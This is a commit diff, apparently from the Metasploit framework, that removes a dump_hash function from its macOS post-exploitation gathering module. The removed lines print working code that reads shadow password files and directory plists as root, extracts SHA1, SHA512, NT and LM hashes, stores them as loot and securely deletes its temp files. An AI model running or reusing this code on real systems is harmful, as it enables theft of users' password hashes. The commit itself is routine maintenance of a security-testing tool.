Land rapid7#3664, enum_osx dump_hash removal

wvu · wvu · commit b748cee7607a · 2014-08-19T11:29:23.000-05:00
diff --git a/modules/post/osx/gather/enum_osx.rb b/modules/post/osx/gather/enum_osx.rb
@@ -46,7 +46,6 @@ def run
     enum_accounts(log_folder, ver_num)
     get_crypto_keys(log_folder)
     screenshot(log_folder, ver_num)
-    dump_hash(ver_num) if running_root
     dump_bash_history(log_folder)
     get_keychains(log_folder)
 
@@ -459,142 +458,6 @@ def dump_bash_history(log_folder)
       end
     end
   end
-  # Dump SHA1 Hashes used by OSX, must be root to get the Hashes
-  def dump_hash(log_folder,ver_num)
-    print_status("Dumping Hashes")
-    users = []
-    nt_hash = nil
-    host = session.session_host
-
-    # Path to files with hashes
-    sha1_file = ""
-
-    # Check if system is Lion if not continue
-    if ver_num =~ /10\.(7)/
-
-      hash_decoded = ""
-
-      # get list of profiles present in the box
-      profiles = cmd_exec("ls /private/var/db/dslocal/nodes/Default/users").split("\n")
-
-      if profiles
-        profiles.each do |p|
-          # Skip none user profiles
-          next if p =~ /^_/
-          next if p =~ /^daemon|root|nobody/
-
-          # Turn profile plist in to XML format
-          cmd_exec("cp","/private/var/db/dslocal/nodes/Default/users/#{p.chomp} /tmp/")
-          cmd_exec("plutil","-convert xml1 /tmp/#{p.chomp}")
-          file = cmd_exec("cat","/tmp/#{p.chomp}")
-
-          # Clean up using secure delete overwriting and zeroing blocks
-          cmd_exec("/usr/bin/srm","-m -z /tmp/#{p.chomp}")
-
-          # Process XML Plist into a usable hash
-          plist_values = read_ds_xml_plist(file)
-
-          # Extract the shadow hash data, decode it and format it
-          plist_values['ShadowHashData'].join("").unpack('m')[0].each_byte do |b|
-            hash_decoded << sprintf("%02X", b)
-          end
-          user = plist_values['name'].join("")
-
-          # Check if NT HASH is present
-          if hash_decoded =~ /4F1010/
-            nt_hash = hash_decoded.scan(/^\w*4F1010(\w*)4F1044/)[0][0]
-          end
-
-          # Carve out the SHA512 Hash, the first 4 bytes is the salt
-          sha512 = hash_decoded.scan(/^\w*4F1044(\w*)(080B190|080D101E31)/)[0][0]
-
-          print_status("SHA512:#{user}:#{sha512}")
-          sha1_file << "#{user}:#{sha512}\n"
-
-          # Reset hash value
-          sha512 = ""
-
-          if nt_hash
-            print_status("NT:#{user}:#{nt_hash}")
-            print_status("Credential saved in database.")
-            report_auth_info(
-              :host   => host,
-              :port   => 445,
-              :sname  => 'smb',
-              :user   => user,
-              :pass   => "AAD3B435B51404EE:#{nt_hash}",
-              :active => true
-            )
-
-            # Reset hash value
-            nt_hash = nil
-          end
-          # Reset hash value
-          hash_decoded = ""
-        end
-      end
-      # Save pwd file
-      upassf = store_loot("osx.hashes.sha512", "text/plain", session, sha1_file, "unshadowed_passwd.pwd", "OSX Unshadowed SHA512 Password File")
-      print_good("Unshadowed Password File: #{upassf}")
-
-      # If system was lion and it was processed nothing more to do
-      return
-    end
-
-    users_folder = cmd_exec("/bin/ls","/Users")
-
-    users_folder.each_line do |u|
-      next if u.chomp =~ /Shared|\.localized/
-      users << u.chomp
-    end
-    # Process each user
-    users.each do |user|
-      if ver_num =~ /10\.(6|5)/
-        guid = cmd_exec("/usr/bin/dscl", "localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
-      elsif ver_num =~ /10\.(4|3)/
-        guid = cmd_exec("/usr/bin/niutil","-readprop . /users/#{user} generateduid").chomp
-      end
-
-      # Extract the hashes
-      sha1_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid}  | cut -c169-216").chomp
-      nt_hash   = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid}  | cut -c1-32").chomp
-      lm_hash   = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid}  | cut -c33-64").chomp
-
-      # Check that we have the hashes and save them
-      if sha1_hash !~ /00000000000000000000000000000000/
-        print_status("SHA1:#{user}:#{sha1_hash}")
-        sha1_file << "#{user}:#{sha1_hash}"
-      end
-
-      if nt_hash !~ /000000000000000/
-        print_status("NT:#{user}:#{nt_hash}")
-        print_status("Credential saved in database.")
-        report_auth_info(
-          :host   => host,
-          :port   => 445,
-          :sname  => 'smb',
-          :user   => user,
-          :pass   => "AAD3B435B51404EE:#{nt_hash}",
-          :active => true
-        )
-      end
-      if lm_hash !~ /0000000000000/
-        print_status("LM:#{user}:#{lm_hash}")
-        print_status("Credential saved in database.")
-        report_auth_info(
-          :host   => host,
-          :port   => 445,
-          :sname  => 'smb',
-          :user   => user,
-          :pass   => "#{lm_hash}:",
-          :active => true
-        )
-      end
-    end
-    # Save pwd file
-    upassf = store_loot("osx.hashes.sha1", "text/plain", session, sha1_file, "unshadowed_passwd.pwd", "OSX Unshadowed SHA1 Password File")
-    print_good("Unshadowed Password File: #{upassf}")
-  end
 
   # Download configured Keychains
   def get_keychains(log_folder)
